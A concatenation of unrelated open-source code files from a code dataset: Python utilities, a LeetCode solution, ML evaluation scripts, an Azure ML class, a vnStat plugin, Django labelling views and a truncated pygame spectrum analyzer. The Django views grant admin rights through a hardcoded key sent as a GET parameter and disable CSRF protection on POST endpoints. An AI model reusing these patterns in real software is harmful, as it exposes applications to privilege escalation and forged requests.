month_arr = [\"januari\", \"februari\", \"maart\", \"april\", \"mei\", \"juni\",\n \"juli\", \"augustus\", \"september\", \"oktober\", \"november\", \"december\"]\n (yr, mnth) = ym.split(\"-\")\n return \"{m} {y}\".format(y=yr, m=month_arr[int(mnth)-1])\n\n\nclass LoopInfo:\n \"\"\"\n This class handles a FOR loop information handling.\n \"\"\"\n\n def __init__(self, attribname, triggercnt):\n \"\"\"\n Initialization of FOR loop information handling. Start message is printed for attribname. Information progress\n message will be printed for every triggercnt iterations.\n :param attribname:\n :param triggercnt:\n :return:\n \"\"\"\n self.rec_cnt = 0\n self.loop_cnt = 0\n self.attribname = attribname\n self.triggercnt = triggercnt\n curr_time = datetime.now().strftime(\"%H:%M:%S\")\n print(\"{0} - Start working on {1}\".format(curr_time, str(self.attribname)))\n return\n\n def info_loop(self):\n \"\"\"\n Check number of iterations. Print message if number of iterations greater or equal than triggercnt.\n :return:\n \"\"\"\n self.rec_cnt += 1\n self.loop_cnt += 1\n if self.loop_cnt >= self.triggercnt:\n curr_time = datetime.now().strftime(\"%H:%M:%S\")\n print(\"{0} - {1} {2} handled\".format(curr_time, str(self.rec_cnt), str(self.attribname)))\n self.loop_cnt = 0\n return\n\n def end_loop(self):\n curr_time = datetime.now().strftime(\"%H:%M:%S\")\n print(\"{0} - {1} {2} handled - End.\\n\".format(curr_time, str(self.rec_cnt), str(self.attribname)))\n return\n","sub_path":"tuin/lib/my_env.py","file_name":"my_env.py","file_ext":"py","file_size_in_byte":10760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"339823678","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Mengxuan Chen\n@description:\n 爬楼梯\n@revise log:\n 2021.02.12 创建程序\n 解题思路:\n\"\"\"\nclass Solution(object):\n def climbStairs(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n # 时间复杂度太高,超时了\n # if n <= 2:\n # return n\n # return self.climbStairs(n - 1) + self.climbStairs(n - 2)\n\n if n <= 3:\n return n\n\n f1, f2, f3 = 1, 2, 0\n\n for i in range(3, n + 1, 1):\n f3 = f1 + f2\n f1 = f2\n f2 = f3\n i += 1\n return f3\n\n","sub_path":"LC 爬楼梯.py","file_name":"LC 爬楼梯.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"572402655","text":"from sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import SGDRegressor\nfrom sklearn.decomposition import PCA\nimport numpy as np\nfrom time import time\nfrom sklearn.metrics import mean_absolute_error\n\nwith open('../dataset/OnlineNewsPopularity/OnlineNewsPopularity.csv', 'r') as file:\n input = file.readlines()\n\nnames = input[0]\nnames = names.split(',')[2:]\ndata = input[1:]\ndata = [line.split(',') for line in data]\ndata = np.array(data)\ndata = data[:,2:].astype(float)\ndata[:,-1:]=np.log(data[:,-1:])\n\npca_alpha = 0.0177827941004\nlr_alpha = 0.00501187233627\n\npca2_trainError = []\npca2_testError = []\npca2_trainTime = []\npca2_testTime = []\n\npca3_trainError = []\npca3_testError = []\npca3_trainTime = []\npca3_testTime = []\n\n\nnumIters = 100\nfor i in xrange(numIters):\n np.random.shuffle(data)\n X = data[:, :-1]\n Y = data[:, -1:]\n\n N = X.shape[0]\n X_use = X[0:N, :]\n Y_use = Y[0:N, :]\n X_hold = X[N:, :]\n Y_hold = Y[N:, :]\n\n scaler = StandardScaler()\n scaler = scaler.fit(X_use)\n X_use = scaler.transform(X_use)\n\n median = np.median(Y_use)\n\n\n pca2 = PCA(n_components=2)\n X_pca2 = pca2.fit_transform(X_use)\n pca3 = PCA(n_components=3)\n X_pca3 = pca3.fit_transform(X_use)\n\n X_train, X_test, y_train, y_test = train_test_split(X_pca2, Y_use.reshape((Y_use.shape[0],)), test_size=0.1)\n pca2Clf = SGDRegressor(penalty='l2', alpha=pca_alpha, learning_rate='optimal', max_iter=1000, tol=1e-3)\n startTrain = time()\n pca2Clf.fit(X_train, y_train)\n startTest = time()\n Ytr_pred = pca2Clf.predict(X_train)\n Yte_pred = pca2Clf.predict(X_test)\n end = time()\n pca2_trainError.append(mean_absolute_error(y_train, Ytr_pred))\n pca2_testError.append(mean_absolute_error(y_test, Yte_pred))\n pca2_trainTime.append(startTest - startTrain)\n pca2_testTime.append(end - startTest)\n\n X_train, X_test, y_train, y_test = train_test_split(X_pca3, Y_use.reshape((Y_use.shape[0],)), test_size=0.1)\n pca3Clf = SGDRegressor(penalty='l2', alpha=pca_alpha, learning_rate='optimal', max_iter=1000, tol=1e-3)\n startTrain = time()\n pca3Clf.fit(X_train, y_train)\n startTest = time()\n Ytr_pred = pca3Clf.predict(X_train)\n Yte_pred = pca3Clf.predict(X_test)\n end = time()\n pca3_trainError.append(mean_absolute_error(y_train, Ytr_pred))\n pca3_testError.append(mean_absolute_error(y_test, Yte_pred))\n pca3_trainTime.append(startTest - startTrain)\n pca3_testTime.append(end - startTest)\n\nprint(\"NumSamples: \",numIters)\nprint(\"Average Mean Absolute Training Error:\")\nprint(\"\\tPCA2: \",np.mean(pca2_trainError))\nprint(\"\\tPCA3: \",np.mean(pca3_trainError))\n\nprint\nprint(\"Average Mean Absolute Testing Error:\")\nprint(\"\\tPCA2: \",np.mean(pca2_testError))\nprint(\"\\tPCA3: \",np.mean(pca3_testError))\n\nprint\nprint(\"Average Training Time:\")\nprint(\"\\tPCA2: \",np.mean(pca2_trainTime))\nprint(\"\\tPCA3: \",np.mean(pca3_trainTime))\n\nprint\nprint(\"Average Testing Time:\")\nprint(\"\\tPCA2: \",np.mean(pca2_testTime))\nprint(\"\\tPCA3: \",np.mean(pca3_testTime))\n\nnp.savetxt('timing_data/train_time_pca2.csv', pca2_trainTime)\nnp.savetxt('timing_data/test_time_pca2.csv', pca2_testTime)\n# np.savetxt('../milestone_4/error_data/train_error_pca2.csv', pca2_trainError)\n# np.savetxt('../milestone_4/error_data/test_error_pca2.csv', pca2_testError)\n\nnp.savetxt('timing_data/train_time_pca3.csv', pca3_trainTime)\nnp.savetxt('timing_data/test_time_pca3.csv', pca3_testTime)\n# np.savetxt('../milestone_4/error_data/train_error_pca3.csv', pca3_trainError)\n# np.savetxt('../milestone_4/error_data/test_error_pca3.csv', pca3_testError)","sub_path":"optional_9/pca_eval.py","file_name":"pca_eval.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"604170248","text":"from DITKChemlistem import DITKChemlistem\n\ndef main(file):\n dataset = {\"train\": file}\n model = DITKChemlistem()\n dataset = model.read_dataset(dataset, \"ditk\")\n\n model.train(dataset[\"train\"])\n predictions = model.predict(dataset[\"test\"])\n\n ground_truth = model.convert_ground_truth(dataset[\"test\"])\n assert(len(ground_truth) == len(predictions))\n print(model.evaluate(predictions,ground_truth))\n return model.write_ditk_output(predictions, dataset[\"train\"])\n","sub_path":"extraction/named_entity/Chemlistem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"343958825","text":"# ---------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# ---------------------------------------------------------\n\nfrom os import PathLike\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Optional, Union\nfrom azure.ai.ml._schema._data.mltable_metadata_schema import MLTableMetadataSchema\nfrom azure.ai.ml._restclient.v2021_10_01.models import UriReference\n\nfrom azure.ai.ml._utils.utils import load_yaml\nfrom azure.ai.ml.constants import BASE_PATH_CONTEXT_KEY\nfrom azure.ai.ml.entities._util import load_from_dict\nfrom marshmallow import INCLUDE\n\n\nclass MLTableMetadata:\n \"\"\"MLTableMetadata for data assets.\n\n :param paths: List of uris which the MLTableMetadata refers to.\n :type paths: List[UriReference]\n :param transformations: Any transformations to be applied to the data referenced in paths.\n :type transformations: List[Any]\n :param base_path: Base path to resolve relative paths from.\n :type base_path: str\n \"\"\"\n\n def __init__(\n self, *, paths: List[UriReference], transformations: Optional[List[Any]] = None, base_path: str, **kwargs\n ):\n self.base_path = base_path\n self.paths = paths\n self.transformations = transformations\n\n @classmethod\n def load(\n cls,\n yaml_path: Union[PathLike, str],\n **kwargs,\n ) -> \"MLTableMetadata\":\n \"\"\"Construct an MLTable object from yaml file.\n\n :param yaml_path: Path to a local file as the source.\n :type PathLike | str\n\n :return: Constructed MLTable object.\n :rtype: MLTable\n \"\"\"\n yaml_dict = load_yaml(yaml_path)\n return cls._load(yaml_data=yaml_dict, yaml_path=yaml_path, **kwargs)\n\n @classmethod\n def _load(\n cls,\n yaml_data: Optional[Dict],\n yaml_path: Optional[Union[PathLike, str]],\n **kwargs,\n ) -> \"MLTableMetadata\":\n yaml_data = yaml_data or {}\n context = {\n BASE_PATH_CONTEXT_KEY: Path(yaml_path).parent if yaml_path else Path(\"./\"),\n }\n return load_from_dict(MLTableMetadataSchema, yaml_data, context, \"\", unknown=INCLUDE, **kwargs)\n\n def _to_dict(self) -> Dict:\n return MLTableMetadataSchema(context={BASE_PATH_CONTEXT_KEY: \"./\"}, unknown=INCLUDE).dump(self)\n\n def referenced_uris(self) -> List[str]:\n return [path.file or path.folder for path in self.paths if path.file or path.folder]\n","sub_path":"sdk/ml/azure-ai-ml/azure/ai/ml/entities/_data/mltable_metadata.py","file_name":"mltable_metadata.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"22298714","text":"# -*- coding: utf-8 -*-\n#########################################################\n# python\nimport os\nimport traceback\nfrom datetime import datetime\nimport subprocess\nimport json\nimport platform\n\n# third-party\n\n# sjva 공용\nfrom framework import db, scheduler, app\nfrom framework.job import Job\nfrom framework.util import Util\nfrom system.logic_command2 import SystemLogicCommand2 as SystemCommand\n\n# 패키지\nfrom .plugin import package_name, logger\nfrom .model import ModelSetting\n\n\ndef strftime(dt, fmt):\n year = dt['date']['year'] if ('date' in dt and 'year' in dt['date']) else 1971\n month = dt['date']['month'] if ('date' in dt and 'month' in dt['date']) else 1\n day = dt['date']['day'] if ('date' in dt and 'day' in dt['date']) else 1\n hour = dt['time']['hour'] if ('time' in dt and 'hour' in dt['time']) else 0\n minute = dt['time']['minute'] if ('time' in dt and 'minute' in dt['time']) else 0\n return datetime(year, month, day, hour, minute).strftime(fmt)\n\n\nclass Logic(object):\n # 디폴트 세팅값\n db_default = {\n 'interval': '20',\n 'default_interface_id': '',\n 'default_traffic_view': '3',\n 'traffic_unit': '1',\n 'traffic_list': '24,24,30,12,0,10'\n }\n\n @staticmethod\n def db_init():\n try:\n for key, value in Logic.db_default.items():\n if db.session.query(ModelSetting).filter_by(key=key).count() == 0:\n db.session.add(ModelSetting(key, value))\n db.session.commit()\n except Exception as e: \n logger.error('Exception:%s', e)\n logger.error(traceback.format_exc())\n\n @staticmethod\n def plugin_load():\n try:\n logger.debug('%s plugin_load', package_name)\n # DB 초기화\n Logic.db_init()\n\n # 편의를 위해 json 파일 생성\n from .plugin import plugin_info\n Util.save_from_dict_to_json(plugin_info, os.path.join(os.path.dirname(__file__), 'info.json'))\n\n # vnstat 자동설치\n is_installed = Logic.is_installed()\n if not is_installed or not any(x in is_installed for x in plugin_info['supported_vnstat_version']):\n Logic.install(show_modal=False)\n except Exception as e:\n logger.error('Exception:%s', e)\n logger.error(traceback.format_exc())\n\n @staticmethod\n def plugin_unload():\n try:\n logger.debug('%s plugin_unload', package_name)\n except Exception as e: \n logger.error('Exception:%s', e)\n logger.error(traceback.format_exc())\n\n @staticmethod\n def setting_save(req):\n try:\n for key, value in req.form.items():\n entity = db.session.query(ModelSetting).filter_by(key=key).with_for_update().first()\n entity.value = value\n db.session.commit()\n return True \n except Exception as e: \n logger.error('Exception:%s', e)\n logger.error(traceback.format_exc())\n return False\n # 기본 구조 End\n ##################################################################\n\n @staticmethod\n def is_installed():\n try:\n verstr = subprocess.check_output(\"vnstat -v\", shell=True, stderr=subprocess.STDOUT).decode('utf-8').strip()\n vernum = verstr.split()[1]\n from .plugin import plugin_info\n if not any(vernum in x for x in plugin_info['supported_vnstat_version']):\n vernum += ' - 지원하지 않는 버전'\n return vernum\n except Exception:\n return False\n\n @staticmethod\n def install(show_modal=True):\n try:\n if platform.system() == 'Linux' and app.config['config']['running_type'] == 'docker':\n install_sh = os.path.join(os.path.dirname(__file__), 'install.sh') \n commands = [\n ['msg', u'잠시만 기다려주세요.'],\n ['chmod', '+x', install_sh],\n [install_sh, '2.6'],\n ['msg', u'완료되었습니다.']\n ]\n SystemCommand('vnStat 설치', commands, wait=True, show_modal=show_modal, clear=True).start()\n return {'success': True}\n else:\n return {'succes': False, 'log': '지원하지 않는 시스템입니다.'}\n except Exception as e:\n logger.error('Exception:%s', e)\n logger.error(traceback.format_exc())\n return {'success': False, 'log': str(e)}\n\n @staticmethod\n def parsing_vnstat_traffic(traffic, data_type):\n labels, rxs, txs, totals = [], [], [], []\n for item in traffic[data_type]:\n # fiveminute, hour, day, month, year, top\n if data_type == 'fiveminute':\n label = strftime(item, '%H:%M')\n if label == '00:00':\n label = strftime(item, '%-d일 ') + label\n elif data_type == 'hour':\n label = strftime(item, '%-H시')\n if label == '0시':\n label = strftime(item, '%-d일 ') + label\n elif data_type == 'day':\n label = strftime(item, '%-d일')\n if label == '1일':\n label = strftime(item, '%-m월 ') + label\n elif data_type == 'month':\n label = strftime(item, '%-m월')\n if label == '1월':\n label = strftime(item, '%y년 ') + label\n elif data_type == 'year':\n label = strftime(item, '%Y년')\n elif data_type == 'top':\n label = strftime(item, '%Y-%m-%d')\n labels.append(label)\n rxs.append(item['rx'])\n txs.append(item['tx'])\n totals.append((item['rx']+item['tx']))\n return {\n 'labels': labels,\n 'rxs': rxs,\n 'txs': txs,\n 'totals': totals,\n }\n \n @staticmethod\n def parsing_vnstat_json(vnstat_json):\n ret = []\n for interface in vnstat_json['interfaces']:\n traffic = interface['traffic']\n vnstat_interfaces = {\n 'name': interface['name'],\n 'created': strftime(interface['created'], '%Y-%m-%d'),\n 'updated': strftime(interface['updated'], '%Y-%m-%d %H:%M'),\n 'fiveminute': Logic.parsing_vnstat_traffic(traffic, 'fiveminute'),\n 'hour': Logic.parsing_vnstat_traffic(traffic, 'hour'),\n 'day': Logic.parsing_vnstat_traffic(traffic, 'day'),\n 'month': Logic.parsing_vnstat_traffic(traffic, 'month'),\n 'year': Logic.parsing_vnstat_traffic(traffic, 'year'),\n 'top': Logic.parsing_vnstat_traffic(traffic, 'top'),\n }\n # summary\n labels, rxs, txs, totals = [], [], [], []\n \n labels.append('오늘')\n rxs.append(vnstat_interfaces['day']['rxs'][-1])\n txs.append(vnstat_interfaces['day']['txs'][-1])\n totals.append(vnstat_interfaces['day']['totals'][-1])\n \n labels.append('이번달')\n rxs.append(vnstat_interfaces['month']['rxs'][-1])\n txs.append(vnstat_interfaces['month']['txs'][-1])\n totals.append(vnstat_interfaces['month']['totals'][-1])\n \n labels.append('전체기간')\n rxs.append(traffic['total']['rx'])\n txs.append(traffic['total']['tx'])\n totals.append((traffic['total']['rx']+traffic['total']['tx']))\n\n vnstat_interfaces.update({'summary': {\n 'labels': labels,\n 'rxs': rxs,\n 'txs': txs,\n 'totals': totals,\n }})\n\n # limit\n tf_view_keys = ['fiveminute', 'hour', 'day', 'month', 'year', 'top']\n tf_list_vals = [x.strip() for x in ModelSetting.get('traffic_list').split(',')]\n for key, val in zip(tf_view_keys, tf_list_vals):\n nlimit = int(val) if val.isdigit() else 0\n for subkey in ['labels', 'rxs', 'txs', 'totals']:\n vnstat_interfaces[key][subkey] = vnstat_interfaces[key][subkey][-nlimit:]\n\n ret.append(vnstat_interfaces)\n return ret\n\n @staticmethod\n def get_vnstat_info():\n try:\n vnstat_stdout = subprocess.check_output(\"vnstat --json\", shell=True, stderr=subprocess.STDOUT).decode('utf-8').strip()\n vnstat_json = json.loads(vnstat_stdout)\n try:\n vnstat_info = Logic.parsing_vnstat_json(vnstat_json)\n return {'ret': 'success', 'data': vnstat_info}\n except Exception as e:\n logger.error('Exception: %s', e)\n return {'ret': 'parsing_error', 'log': str(e)}\n except subprocess.CalledProcessError as e:\n # vnStat 바이너리가 없을때\n logger.error('Exception:%s', e.output.strip())\n return {'ret': 'no_bin', 'log': e.output.strip().decode('utf-8')}\n except Exception as e:\n # 그 외의 에러, 대부분 데이터베이스가 없어서 json 값이 들어오지 않는 경우\n logger.error('Exception:%s', e)\n return {'ret': 'no_json', 'log': vnstat_stdout}\n","sub_path":"logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":9415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"457624429","text":"# THIS NEEDS TO BE UPDATED FOR ACCURATE STATS\nMAX_WEEK = 6\nSTART_WEEK = 1\n\nWEEK = \"WEEK\"\nPOINTS_FOR = \"PF\"\nPOINTS_AGAINST = \"PA\"\nMAX_POINTS_FOR = \"MPF\"\nWINS = \"WINS\"\nEXPECTED_WINS = \"EXPECTED_WINS\"\nMATCHUP_ID = \"matchup_id\"\nROSTER_ID = \"roster_id\"\nUSER_ID = \"user_id\"\nMETADATA = \"metadata\"\nTEAM_NAME = \"team_name\"\nDISPLAY_NAME = \"display_name\"\nMATCHUPS = \"matchups\"\nPOINTS = \"points\"\nOWNER_ID = \"owner_id\"\nROSTER_REPEAT_PREFIX = \"roster_\"","sub_path":"Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"580168844","text":"from collections import defaultdict\nimport csv\nimport json\nimport logging\nimport sys\nimport traceback\nimport uuid\nfrom xml.sax.saxutils import escape\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http import JsonResponse, QueryDict\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport gender_guesser.detector as gender_detector\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework_api_key.permissions import HasAPIKey\n\nfrom backend.db_management import add_user_label_to_db, request_labelling_task\nfrom backend.extraction_pipeline import extract_people_quoted\nfrom backend.frontend_parsing.frontend_to_postgre import clean_user_labels\nfrom backend.frontend_parsing.postgre_to_frontend import load_paragraph_above, load_paragraph_below\nfrom backend.helpers import change_confidence\nfrom backend.xml_parsing.helpers import load_nlp\nfrom .models import Article\n\n\nlogger = logging.getLogger(__name__)\n\n\n# The life span of a cookie, in seconds\nCOOKIE_LIFE_SPAN = 1 * 60 * 60\n\n# The key needed to become an admin\nADMIN_SECRET_KEY = 'i_want_to_be_admin'\n\n\ndef load_content(request):\n \"\"\"\n Selects either a sentence or a paragraph that needs to be labelled. Creates a JSON file that contains an article_id\n (an integer), sentence_id (a list of integers), data (a list of strings), a task (a string: 'sentence' if a\n sentence needs to be labelled, 'paragraph' if a whole paragraph needs to be labelled, 'None' if there are no more\n sentences to label in the database and 'error' if an error happened in the backend) and a boolean 'admin value',\n which is true is the user has been assigned as an admin.\n\n If a sentence needs to be labelled, sentence_id is a list of a least one integer, and data is a list of individual\n tokens (words). If a paragraph needs to be annotated, sentence_id is an empty list, and data is a list containing a\n single string, which is the content of the entire paragraph.\n\n If the task is 'None', then the article ID is -1 and both the sentence id and data are empty lists.\n\n :param request: HTTP GET Request\n The request with the\n :return: JsonResponse\n A Json file containing the 'article_id', 'sentence_id', 'data', 'task' and 'admin'.\n \"\"\"\n user_id, quote_count, admin_tagger = session_load(request)\n labelling_task = request_labelling_task(user_id)\n if labelling_task is not None:\n labelling_task['admin'] = admin_tagger\n labelling_task['quote_count'] = quote_count\n return JsonResponse(labelling_task)\n else:\n return JsonResponse({'article_id': -1, 'sentence_id': [], 'data': [], 'task': 'None', 'admin': admin_tagger})\n\n\ndef load_above(request):\n \"\"\"\n Loads the tokens of the paragraph above a given sentence, or the whole paragraph if the sentence is in a paragraph\n below it. Forms a Json file that always contains the key 'Success'.\n\n If the value of 'Success' is true, then the Json also contains 'data' (a list of strings), 'first_sentence' (an\n integer representing the index of the first sentence who's tokens are in data) and 'last_sentence' (an integer\n representing the index of the last sentence who's tokens are in data).\n\n If the value of 'Success' is false, then the Json also contains the 'reason' key, which has as a value either\n 'KeyError' (if one of the required parameters of the GET request wasn't there) or 'not GET' (if the request wasn't a\n GET request).\n\n :param request: HTTP GET Request\n The user request, with a Json payload containing two keys: 'article_id' and 'first_sentence'\n :return: JsonResponse\n A Json file containing the the list of tokens of the paragraph above the sentence.\n \"\"\"\n if request.method == 'GET':\n try:\n # Get user tags\n data = dict(request.GET)\n article_id = int(data['article_id'][0])\n first_sentence = int(data['first_sentence'][0])\n data = load_paragraph_above(article_id, first_sentence)\n data['Success'] = True\n return JsonResponse(data)\n except KeyError:\n return JsonResponse({'Success': False, 'reason': 'KeyError'})\n return JsonResponse({'Success': False, 'reason': 'not GET'})\n\n\ndef load_below(request):\n \"\"\"\n Loads the tokens of the paragraph below a given sentence, or the whole paragraph if the sentence is in a paragraph\n above it. Forms a Json file that always contains the key 'Success'.\n\n If the value of 'Success' is true, then the Json also contains 'data' (a list of strings), 'first_sentence' (an\n integer representing the index of the first sentence who's tokens are in data) and 'last_sentence' (an integer\n representing the index of the last sentence who's tokens are in data).\n\n If the value of 'Success' is false, then the Json also contains the 'reason' key, which has as a value either\n 'KeyError' (if one of the required parameters of the GET request wasn't there) or 'not GET' (if the request wasn't a\n GET request).\n\n :param request: HTTP GET Request\n The user request, with a Json payload containing two keys: 'article_id' and 'last_sentence'\n :return: JsonResponse\n A Json file containing the list of tokens of the paragraph below the sentence.\n \"\"\"\n if request.method == 'GET':\n try:\n # Get user tags\n data = dict(request.GET)\n article_id = int(data['article_id'][0])\n last_sentence = int(data['last_sentence'][0])\n data = load_paragraph_below(article_id, last_sentence)\n data['Success'] = True\n return JsonResponse(data)\n except KeyError:\n return JsonResponse({'Success': False, 'reason': 'KeyError'})\n return JsonResponse({'Success': False, 'reason': 'not GET'})\n\n\n@csrf_exempt\ndef submit_tags(request):\n \"\"\"\n Adds the labels a user created to the database.\n\n :param request: HTTP POST request\n A post request containing the labels the user created. Contains the following keys.\n * 'article_id': The id of the article that the user annotated.\n * 'sentence_id': The list of sentence indices that the user annotated.\n * 'first_sentence': The index of the first sentence who's tokens are in tags\n * 'last_sentence': The index of the last sentence who's tokens are in tags\n * 'tags': A list of tags for each token in the sentences.\n * 'authors': A list of token indices that are authors of the quote, and an empty list if no reported speech\n was in the sentences.\n * 'task': The task that the user performed ('sentence' or 'paragraph').\n :return: JsonResponse\n A Json containing the key 'success'. If it's value is false, also contains a key 'reason' that can have values\n 'not POST' (if the request wasn't a POST request) or 'KeyError' (if a key was missing from the request).\n \"\"\"\n # Session stuff\n user_id, admin_tagger = session_post(request)\n if user_id is None:\n return JsonResponse({'success': False, 'reason': 'cookies'})\n if request.method == 'POST':\n try:\n data = json.loads(request.body)\n article_id = data['article_id']\n sent_id = data['sentence_id']\n first_sent = data['first_sentence']\n last_sent = data['last_sentence']\n labels = data['tags']\n authors = data['authors']\n task = data['task']\n\n try:\n article = Article.objects.get(id=article_id)\n except ObjectDoesNotExist:\n return JsonResponse({'success': False, 'reason': 'Invalid Article ID'})\n\n if labels == []:\n # The user didn't know how to annotate the sentence.\n for s in sent_id:\n add_user_label_to_db(user_id, article_id, s, [], [], False)\n else:\n # The user knew how to annotate the sentence.\n if task == 'paragraph' and sum(labels) > 0:\n # If the task was to label a paragraph, and the user answered that there were some quotes in the\n # paragraph, reset the confidences for the whole paragraph to 0.\n sentence_confidences = article.confidence['confidence'].copy()\n sentence_confidences[first_sent:last_sent + 1] = (last_sent - first_sent + 1) * [0]\n change_confidence(article_id, sentence_confidences, article.confidence['predictions'])\n else:\n sentence_ends = article.sentences['sentences']\n clean_labels = clean_user_labels(sentence_ends, sent_id, first_sent, last_sent, labels, authors)\n logger.warn(clean_labels)\n found_quote = False\n for sentence in clean_labels:\n if sum(sentence['labels']) > 0:\n found_quote = True\n add_user_label_to_db(user_id, article_id, sentence['index'], sentence['labels'],\n sentence['authors'], admin_tagger)\n if found_quote:\n request.session['quote_count'] += 1\n return JsonResponse({'success': True})\n except KeyError:\n traceback.print_exc(file=sys.stdout)\n return JsonResponse({'success': False, 'reason': 'KeyError'})\n return JsonResponse({'success': False, 'reason': 'not POST'})\n\n\ndef session_load(request):\n \"\"\"\n Checks if the user already has a session key. If they don't, create one.\n\n :param request: HTTP Request\n The request from the user.\n :return: string, boolean\n The user's id.\n If the user is admin.\n \"\"\"\n if 'id' in request.session:\n user_id = request.session['id']\n else:\n request.session.set_test_cookie()\n user_id = str(uuid.uuid1())\n request.session['id'] = user_id\n\n if 'quote_count' in request.session:\n quote_count = request.session['quote_count']\n else:\n quote_count = 0\n request.session['quote_count'] = quote_count\n\n admin_tagger = False\n if 'admin' in request.session and request.session['admin']:\n admin_tagger = True\n logger.warn(user_id)\n return user_id, quote_count, admin_tagger\n\n\ndef session_post(request):\n \"\"\"\n Checks if the user has a session key.\n\n :param request: HTTP Request\n The request from the user.\n :return: string, boolean\n The user's id, or None if the user hasn't been assigned an ID.\n If the user is admin.\n \"\"\"\n if 'id' not in request.session:\n logger.warn(\"No session in post\")\n return None\n admin_tagger = False\n if 'admin' in request.session and request.session['admin']:\n admin_tagger = True\n logger.warn(request.session['id'])\n return request.session['id'], admin_tagger\n\n\ndef become_admin(request):\n \"\"\"\n Assigns an admin cookie to the user, if and only if they have the correct key as a parameter.\n\n :param request: HTTP GET Request\n The user request. Must contain a 'key' parameter with the correct value for the user to become an admin.\n :return: JsonResponse\n A Json containing the key 'Success', with value True if the user became an admin and false otherwise.\n \"\"\"\n # Get user secret key\n data = dict(request.GET)\n secret_key = data['key'][0]\n if secret_key == ADMIN_SECRET_KEY:\n request.session['admin'] = True\n return JsonResponse({'Success': True})\n\n return JsonResponse({'Success': False})\n\n\nnlp = load_nlp()\ndetector = gender_detector.Detector()\n\nclass GetCounts(APIView):\n def post(self, request):\n with open('data/cue_verbs.csv', 'r') as f:\n reader = csv.reader(f)\n cue_verbs = set(list(reader)[0])\n\n template = \"\"\"\n
\n \n

{}

\n
\"\"\"\n\n # Clean article text\n if \"text\" not in request.data:\n # Check if data was passed through the form\n if isinstance(request.data, QueryDict):\n t = request.data.get(\"_content\")\n else:\n raise ValueError(f'key \"text\" missing: {request.data}')\n else:\n t = request.data[\"text\"]\n if type(\"hello\") != str:\n raise ValueError(f'No text after text key. Write <\"text\": \"example text\">')\n\n clean_t = t.replace(\"\\n\", \" \")\n clean_t = clean_t.replace(\"\\\\n\", \" \")\n clean_t = clean_t.replace(\"\\\\\\n\", \" \")\n clean_t = clean_t.replace(\"\\t\", \" \")\n clean_t = clean_t.replace(\"\\\\t\", \" \")\n clean_t = clean_t.replace(\"\\\\\\t\", \" \")\n xml_text = template.format(escape(clean_t))\n\n # Get default genders\n people = extract_people_quoted(xml_text, nlp, cue_verbs, lazy_baseline=True)\n first_names = [p.split(\" \")[0] for p in people]\n \n people_genders = {\n 'female': [],\n 'mostly_female': [],\n 'mostly_male': [],\n 'male': [],\n 'androgyne': [],\n 'unknown': [],\n }\n\n extra_names_m = []\n extra_names_f = []\n\n # Check for optional gender dictionary\n if \"gender_dict\" in request.data:\n gender_dict = request.data[\"gender_dict\"]\n if \"m\" in gender_dict and \"f\" in gender_dict:\n # Lowercase the strings\n extra_names_m = [name.lower() for name in gender_dict[\"m\"]]\n extra_names_f = [name.lower() for name in gender_dict[\"f\"]]\n\n for n, p in zip(first_names, people):\n if n.lower() in extra_names_m:\n people_genders['male'].append(p)\n elif n.lower() in extra_names_f:\n people_genders['female'].append(p)\n else:\n g = detector.get_gender(n.capitalize())\n if g == 'andy':\n people_genders['androgyne'].append(p)\n else:\n people_genders[g].append(p)\n\n return Response({\"people\": people_genders})\n","sub_path":"activelearning/backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"5640158","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# created by Keisuke Okumura\n\nimport atexit\nimport time\nimport numpy as np\nimport pyaudio\nimport pygame\nfrom pygame.locals import *\nfrom sys import exit\n\n\nclass Spectrum(object):\n \"\"\"リアルタイムアナライザー\n \"\"\"\n\n def __init__(self, screen_width, screen_height):\n # FFT変換のための設定\n self.pa = pyaudio.PyAudio()\n self.last_samples = None\n self.FORMAT = pyaudio.paFloat32\n self.CHANNELS = 1\n self.RATE = 16000\n self.FRAME_LEN = 512\n atexit.register(self.pa.terminate)\n # pygameの設定\n self.SCREEN_SIZE = (screen_width, screen_height)\n pygame.init()\n self.screen = pygame.display.set_mode(self.SCREEN_SIZE, RESIZABLE, NOFRAME)\n\n # ==============\n # 高速FFT\n # ==============\n def fft(self, samples):\n win = np.hanning(len(samples))\n res = np.fft.fftshift(np.fft.fft(win*samples))\n freq = np.fft.fftfreq(len(samples), d=self.RATE**-1)\n return zip(freq, 20*np.log10(np.abs(res)))\n\n # ==============\n # CallBack関数\n # ==============\n def callback(self, in_data, frame_count, time_info, status):\n data = np.fromstring(in_data, np.float32)\n pr = []\n for f, v in self.fft(data)[256-64:256]:\n pr.append(min(99, max(0, int((v+50)))))\n self.draw(pr)\n return (in_data, self.recording)\n\n # ==============\n # 解析開始\n # ==============\n def record(self):\n self.recording = pyaudio.paContinue\n stream = self.pa.open(format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n 